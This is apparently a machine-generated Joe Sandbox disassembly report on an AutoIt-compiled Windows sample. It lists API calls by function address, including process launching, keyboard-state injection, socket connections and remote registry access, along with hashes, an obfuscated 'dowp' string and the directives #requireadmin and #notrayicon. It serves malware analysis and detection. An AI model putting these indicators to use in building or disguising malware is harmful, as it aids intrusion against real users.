                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BB432F
                                              • LoadStringW.USER32(00000000), ref: 00BB4336
                                              • _wprintf.LIBCMT ref: 00BB435C
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BB437A
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00BB4357
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              • Opcode ID: 3a1ccdc2e7fb3b5d32026e597e78ee804d3e264cd3244780e599d53550b35dda
                                              • Instruction ID: 20859626d56e952e0f7fbd7b6383b2f0537a4cb310b7a21ea06ab51e6c0d136f
                                              • Opcode Fuzzy Hash: 3a1ccdc2e7fb3b5d32026e597e78ee804d3e264cd3244780e599d53550b35dda
                                              • Instruction Fuzzy Hash: 3A0162F2905209BFE71197A4DD89EF6B7ACEB08700F0045B2B74AE3051FA749E858B74
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B52ACF
                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00B52B17
                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B8C21A
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B8C286
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 0f7febb737811cfc351f27f8d2c7ef838b86785a774296f0308e27d689f3b71c
                                              • Instruction ID: de069cde4ea2fa0b9d9a658cdb92d8343ab329911117e22a3638f6d3a93df752
                                              • Opcode Fuzzy Hash: 0f7febb737811cfc351f27f8d2c7ef838b86785a774296f0308e27d689f3b71c
                                              • Instruction Fuzzy Hash: DD41DB7160AA80DAD7399F28CCD8B7A7FD2EB8B311F1484D9E847475B1C671984DD720
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00BB70DD
                                                • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00BB7114
                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00BB7130
                                              • _memmove.LIBCMT ref: 00BB717E
                                              • _memmove.LIBCMT ref: 00BB719B
                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00BB71AA
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00BB71BF
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB71DE
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 256516436-0
                                              • Opcode ID: 5ec9a9c7ada74b4f6dc09e5f4215797e4919fc08cbaaeeaeeed45f7f800d37c0
                                              • Instruction ID: 8e6dc94807faaa4660b303ef2cf182f9d24d7464a7e41fe4f9779cac4e0941c8
                                              • Opcode Fuzzy Hash: 5ec9a9c7ada74b4f6dc09e5f4215797e4919fc08cbaaeeaeeed45f7f800d37c0
                                              • Instruction Fuzzy Hash: C2316F31904205EBCF10EFA4DC85AAFB7B8EF45710F1481B6F904AB256EB709E10CBA0
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00BD61EB
                                              • GetDC.USER32(00000000), ref: 00BD61F3
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BD61FE
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00BD620A
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BD6246
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD6257
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BD902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00BD6291
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BD62B1
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              • Opcode ID: 5a63fc2033b27f4c374de811e75b9f3f1545a6a95e47f1fbe4d2f5725050be3e
                                              • Instruction ID: 58320627a38f12c6b31a765718c09a6c68eb357c8a950cf35cfc0ee56b52f80b
                                              • Opcode Fuzzy Hash: 5a63fc2033b27f4c374de811e75b9f3f1545a6a95e47f1fbe4d2f5725050be3e
                                              • Instruction Fuzzy Hash: D5319F72101214BFEB108F10CC8AFFA7BA9EF49761F044066FE099B291EA759C41CB60
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: b036e3cbf9fc5c00411bc4e1491a8b980a2c1ce9b9d79ca864571c81e3eb486b
                                              • Instruction ID: b65070f8860553911351b269b4db5a90976c6b27e3f48c14b463a08817441a34
                                              • Opcode Fuzzy Hash: b036e3cbf9fc5c00411bc4e1491a8b980a2c1ce9b9d79ca864571c81e3eb486b
                                              • Instruction Fuzzy Hash: 0C21D4716092057BA304672A9D82FBF73DDEE12358F0884E0FD28A6783FB24DE1185B1
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e604f0e3fd85da4e6adbfd466010a07f93b6798e7be2d3f8387d6bed3311909
                                              • Instruction ID: 31349031bf218e576fdf863db0cd4d532f5827a5a06894e70f0980a4d669c65d
                                              • Opcode Fuzzy Hash: 2e604f0e3fd85da4e6adbfd466010a07f93b6798e7be2d3f8387d6bed3311909
                                              • Instruction Fuzzy Hash: 4A716734901109EFCB049F98CC89FBEBBB9FF85311F148599E916AB251D730AA15CFA4
                                              APIs
                                              • IsWindow.USER32(00F921C0), ref: 00BDB3EB
                                              • IsWindowEnabled.USER32(00F921C0), ref: 00BDB3F7
                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BDB4DB
                                              • SendMessageW.USER32(00F921C0,000000B0,?,?), ref: 00BDB512
                                              • IsDlgButtonChecked.USER32(?,?), ref: 00BDB54F
                                              • GetWindowLongW.USER32(00F921C0,000000EC), ref: 00BDB571
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BDB589
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID:
                                              • API String ID: 4072528602-0
                                              • Opcode ID: 6d5a0d81774d741a465316b5c8d49f10df51f5a72bdade9f56227a57bcf04638
                                              • Instruction ID: c6be3d1cce2d41069dcd5b7f4d45ac0a43607b947e9b5e9c17488becd6f784f7
                                              • Opcode Fuzzy Hash: 6d5a0d81774d741a465316b5c8d49f10df51f5a72bdade9f56227a57bcf04638
                                              • Instruction Fuzzy Hash: 3271AB34605204EFDB21DF54C8A0FBAFBE9EF4A310F15809AE946973A2E731A940DB54
                                              APIs
                                              • _memset.LIBCMT ref: 00BCF448
                                              • _memset.LIBCMT ref: 00BCF511
                                              • ShellExecuteExW.SHELL32(?), ref: 00BCF556
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                              • GetProcessId.KERNEL32(00000000), ref: 00BCF5CD
                                              • CloseHandle.KERNEL32(00000000), ref: 00BCF5FC
                                              Similarity
                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                              • String ID: @
                                              • API String ID: 3522835683-2766056989
                                              • Opcode ID: 9fd82213bc7993b3e2c8526c6120d52c30a18e8228f499a6417c97d51cd609f6
                                              • Instruction ID: c0b4cffb1eb7b2d52941c3b529eb73159014e9ac9d2a368a7d9f24cf754d9e2c
                                              • Opcode Fuzzy Hash: 9fd82213bc7993b3e2c8526c6120d52c30a18e8228f499a6417c97d51cd609f6
                                              • Instruction Fuzzy Hash: 91614D75A0061ADFCB14EF64C891AAEBBF5FF49310F1480E9E859AB351CB30AD45CB94
                                              APIs
                                              • GetParent.USER32(?), ref: 00BB0F8C
                                              • GetKeyboardState.USER32(?), ref: 00BB0FA1
                                              • SetKeyboardState.USER32(?), ref: 00BB1002
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BB1030
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BB104F
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BB1095
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BB10B8
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 2e2ba70bf6ddba93b79906c9fe52a5f8a27e4d9b7ebf2fa3b0d30386695719db
                                              • Instruction ID: be495988ebda31f124995857444d65172b9dcf9e0d419ded5810f03ca79939b9
                                              • Opcode Fuzzy Hash: 2e2ba70bf6ddba93b79906c9fe52a5f8a27e4d9b7ebf2fa3b0d30386695719db
                                              • Instruction Fuzzy Hash: B351F1606186D53FFB3652388C25BFABEE9DB06304F4889C9E1D5968C2C2D8DCC4D751
                                              APIs
                                              • GetParent.USER32(00000000), ref: 00BB0DA5
                                              • GetKeyboardState.USER32(?), ref: 00BB0DBA
                                              • SetKeyboardState.USER32(?), ref: 00BB0E1B
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BB0E47
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BB0E64
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BB0EA8
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BB0EC9
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              APIs
                                              Similarity
                                              • API ID: _wcsncpy$LocalTime
                                              • String ID:
                                              • API String ID: 2945705084-0
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00B52357
                                              • ScreenToClient.USER32(00C157B0,?), ref: 00B52374
                                              • GetAsyncKeyState.USER32(00000001), ref: 00B52399
                                              • GetAsyncKeyState.USER32(00000002), ref: 00B523A7
                                              Strings
                                              • dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5, xrefs: 00B8BFF9
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID: dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5
                                              • API String ID: 4210589936-3861665079
                                              APIs
                                                • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BB3697,?), ref: 00BB468B
                                                • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BB3697,?), ref: 00BB46A4
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00BB36B7
                                              • _wcscmp.LIBCMT ref: 00BB36D3
                                              • MoveFileW.KERNEL32(?,?), ref: 00BB36EB
                                              • _wcscat.LIBCMT ref: 00BB3733
                                              • SHFileOperationW.SHELL32(?), ref: 00BB379F
                                              Similarity
                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 1377345388-1173974218
                                              APIs
                                              • _memset.LIBCMT ref: 00BD72AA
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD7351
                                              • IsMenu.USER32(?), ref: 00BD7369
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD73B1
                                              • DrawMenuBar.USER32 ref: 00BD73C4
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                              • String ID: 0
                                              • API String ID: 3866635326-4108050209
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00BD0FD4
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD0FFE
                                              • FreeLibrary.KERNEL32(00000000), ref: 00BD10B5
                                                • Part of subcall function 00BD0FA5: RegCloseKey.ADVAPI32(?), ref: 00BD101B
                                                • Part of subcall function 00BD0FA5: FreeLibrary.KERNEL32(?), ref: 00BD106D
                                                • Part of subcall function 00BD0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BD1090
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BD1058
                                              Similarity
                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                              • String ID:
                                              • API String ID: 395352322-0
                                              APIs
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BD62EC
                                              • GetWindowLongW.USER32(00F921C0,000000F0), ref: 00BD631F
                                              • GetWindowLongW.USER32(00F921C0,000000F0), ref: 00BD6354
                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BD6386
                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BD63B0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00BD63C1
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BD63DB
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADB2E
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADB54
                                              • SysAllocString.OLEAUT32(00000000), ref: 00BADB57
                                              • SysAllocString.OLEAUT32(?), ref: 00BADB75
                                              • SysFreeString.OLEAUT32(?), ref: 00BADB7E
                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 00BADBA3
                                              • SysAllocString.OLEAUT32(?), ref: 00BADBB1
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              APIs
                                                • Part of subcall function 00BC7D8B: inet_addr.WS2_32(00000000), ref: 00BC7DB6
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00BC61C6
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC61D5
                                              • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00BC620E
                                              • connect.WSOCK32(00000000,?,00000010), ref: 00BC6217
                                              • WSAGetLastError.WS2_32 ref: 00BC6221
                                              • closesocket.WS2_32(00000000), ref: 00BC624A
                                              • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00BC6263
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              APIs
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 1038674560-2734436370
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADC09
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADC2F
                                              • SysAllocString.OLEAUT32(00000000), ref: 00BADC32
                                              • SysAllocString.OLEAUT32 ref: 00BADC53
                                              • SysFreeString.OLEAUT32 ref: 00BADC5C
                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 00BADC76
                                              • SysAllocString.OLEAUT32(?), ref: 00BADC84
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              APIs
                                                • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BD7632
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BD763F
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BD764A
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BD7659
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BD7665
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 01bee5a52cc59dacc1c45217c30d40014079b9ecc12cd37c507ff5100f9cb156
                                              • Instruction ID: 2d32113ed6addb12c686b7694d425f546c0dc11412e87eeaac5f96aa251d762b
                                              • Opcode Fuzzy Hash: 01bee5a52cc59dacc1c45217c30d40014079b9ecc12cd37c507ff5100f9cb156
                                              • Instruction Fuzzy Hash: 6E11B6B1150119BFEF158F64CC85EE7BF6DEF08798F014115BA04A21A0EB72DC21DBA4
                                              APIs
                                              • __init_pointers.LIBCMT ref: 00B79AE6
                                                • Part of subcall function 00B73187: RtlEncodePointer.NTDLL(00000000), ref: 00B7318A
                                                • Part of subcall function 00B73187: __initp_misc_winsig.LIBCMT ref: 00B731A5
                                                • Part of subcall function 00B73187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B79EA0
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B79EB4
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B79EC7
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B79EDA
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B79EED
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B79F00
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B79F13
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B79F26
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B79F39
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B79F4C
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B79F5F
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B79F72
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B79F85
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B79F98
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B79FAB
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B79FBE
                                              • __mtinitlocks.LIBCMT ref: 00B79AEB
                                              • __mtterm.LIBCMT ref: 00B79AF4
                                                • Part of subcall function 00B79B5C: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00B79C56
                                                • Part of subcall function 00B79B5C: _free.LIBCMT ref: 00B79C5D
                                                • Part of subcall function 00B79B5C: RtlDeleteCriticalSection.NTDLL(00C0EC00), ref: 00B79C7F
                                              • __calloc_crt.LIBCMT ref: 00B79B19
                                              • __initptd.LIBCMT ref: 00B79B3B
                                              • GetCurrentThreadId.KERNEL32 ref: 00B79B42
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                              • String ID:
                                              • API String ID: 3567560977-0
                                              • Opcode ID: fe6b3a0605a95e3c503b06c467115b59ed7865f46a842d7f9f61f738295545c9
                                              • Instruction ID: a3d792a3b8cbd202e7dd9321490c9b3a74dea6172018385965d7f73cd02ae927
                                              • Opcode Fuzzy Hash: fe6b3a0605a95e3c503b06c467115b59ed7865f46a842d7f9f61f738295545c9
                                              • Instruction Fuzzy Hash: C7F0903254A7126AE6347B74BC07B8A27D1DF02730F20CAEAF57CD61D2FF20884141A0
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B73F85), ref: 00B74085
                                              • GetProcAddress.KERNEL32(00000000), ref: 00B7408C
                                              • RtlEncodePointer.NTDLL(00000000), ref: 00B74097
                                              • RtlDecodePointer.NTDLL(00B73F85), ref: 00B740B2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: c0223a6653b44cd07f40a51653a4fe846a0f4fccdec8b3977a19951b56508483
                                              • Instruction ID: 8bd2a7d5c656f4c1964015e0843eded6867060b0f8d315b13a3ae295781b98b4
                                              • Opcode Fuzzy Hash: c0223a6653b44cd07f40a51653a4fe846a0f4fccdec8b3977a19951b56508483
                                              • Instruction Fuzzy Hash: 65E09A7058A241ABEA119F61EC19B597AE5B705746F208075F112E21E0DFB64604DA14
                                              APIs
                                              • __WSAFDIsSet.WS2_32(00000000,?), ref: 00BC6C00
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC6C34
                                              • htons.WS2_32(?), ref: 00BC6CEA
                                              • inet_ntoa.WS2_32(?), ref: 00BC6CA7
                                                • Part of subcall function 00BAA7E9: _strlen.LIBCMT ref: 00BAA7F3
                                                • Part of subcall function 00BAA7E9: _memmove.LIBCMT ref: 00BAA815
                                              • _strlen.LIBCMT ref: 00BC6D44
                                              • _memmove.LIBCMT ref: 00BC6DAD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3619996494-0
                                              • Opcode ID: 1c14edc99f526f8a03a67dd0f1fcb7054acb750315bde6b03376ad3e48fb12e4
                                              • Instruction ID: 433bfdc74c12be102462d37a90cfcad9a6b5e07748f2c6317b605d096bf1c2e6
                                              • Opcode Fuzzy Hash: 1c14edc99f526f8a03a67dd0f1fcb7054acb750315bde6b03376ad3e48fb12e4
                                              • Instruction Fuzzy Hash: 6181A071208300ABD710EB24CC96F6AB7E8EF84714F1449ADF9569B2E2DB70DD05CB62
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              • Opcode ID: e2a829fb8478e28b87f82a18d603bb5082bfab9ba9f422072b5fb86ac937802f
                                              • Instruction ID: 03a47184b5b677349ac2893860b8ba8029d34e5e6635e66b296bfce904642b00
                                              • Opcode Fuzzy Hash: e2a829fb8478e28b87f82a18d603bb5082bfab9ba9f422072b5fb86ac937802f
                                              • Instruction Fuzzy Hash: 1A616A3090065A9BDF11EF64CC82BFE37E5AF05308F0445E9FC5A6B192DA78AD19CB51
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD02BD
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD02FD
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BD0320
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BD0349
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BD038C
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BD0399
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              • Opcode ID: fb65013afe229c407330b7a39b42212039927fd69b5570a292e6092b87b516db
                                              • Instruction ID: 858f21f1ad90d822d41cdb45ea28fd9af1bc3b8770543e994d5c15d16c08f31b
                                              • Opcode Fuzzy Hash: fb65013afe229c407330b7a39b42212039927fd69b5570a292e6092b87b516db
                                              • Instruction Fuzzy Hash: 96516C71218304AFC710EF64D895E6EBBE8FF89314F04499EF855872A1EB31E909CB52
                                              APIs
                                              • GetMenu.USER32(?), ref: 00BD57FB
                                              • GetMenuItemCount.USER32(00000000), ref: 00BD5832
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BD585A
                                              • GetMenuItemID.USER32(?,?), ref: 00BD58C9
                                              • GetSubMenu.USER32(?,?), ref: 00BD58D7
                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BD5928
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountMessagePostString
                                              • String ID:
                                              • API String ID: 650687236-0
                                              • Opcode ID: 7f7cc3b23fa69d1d63ff2848f84ea2da718efdd7efbea276a6873dde56b5934a
                                              • Instruction ID: 7cce33a29f35f4ff8ec84fe43652345d46e20d68a9371a00950ac53c53fde9a1
                                              • Opcode Fuzzy Hash: 7f7cc3b23fa69d1d63ff2848f84ea2da718efdd7efbea276a6873dde56b5934a
                                              • Instruction Fuzzy Hash: 00517C31E01A15EFCF10EF64C855AAEB7F4EF48310F1040A6E816AB351DB75AE419B90
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BAEF06
                                              • VariantClear.OLEAUT32(00000013), ref: 00BAEF78
                                              • VariantClear.OLEAUT32(00000000), ref: 00BAEFD3
                                              • _memmove.LIBCMT ref: 00BAEFFD
                                              • VariantClear.OLEAUT32(?), ref: 00BAF04A
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BAF078
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                              • String ID:
                                              • API String ID: 1101466143-0
                                              • Opcode ID: 11c6a21bff0d86b316f446e421ed542d0ecdec8cadcb875e931a4136a308133e
                                              • Instruction ID: 151b5b3d21c36c2ced26e2406ecbed2465667615c015f0d03595d6d50ca0bb78
                                              • Opcode Fuzzy Hash: 11c6a21bff0d86b316f446e421ed542d0ecdec8cadcb875e931a4136a308133e
                                              • Instruction Fuzzy Hash: 67516D75A0020AEFDB24CF58C890AAAB7F8FF4D314B15856AE959DB301E735E911CF90
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2258
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB22A3
                                              • IsMenu.USER32(00000000), ref: 00BB22C3
                                              • CreatePopupMenu.USER32 ref: 00BB22F7
                                              • GetMenuItemCount.USER32(000000FF), ref: 00BB2355
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00BB2386
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
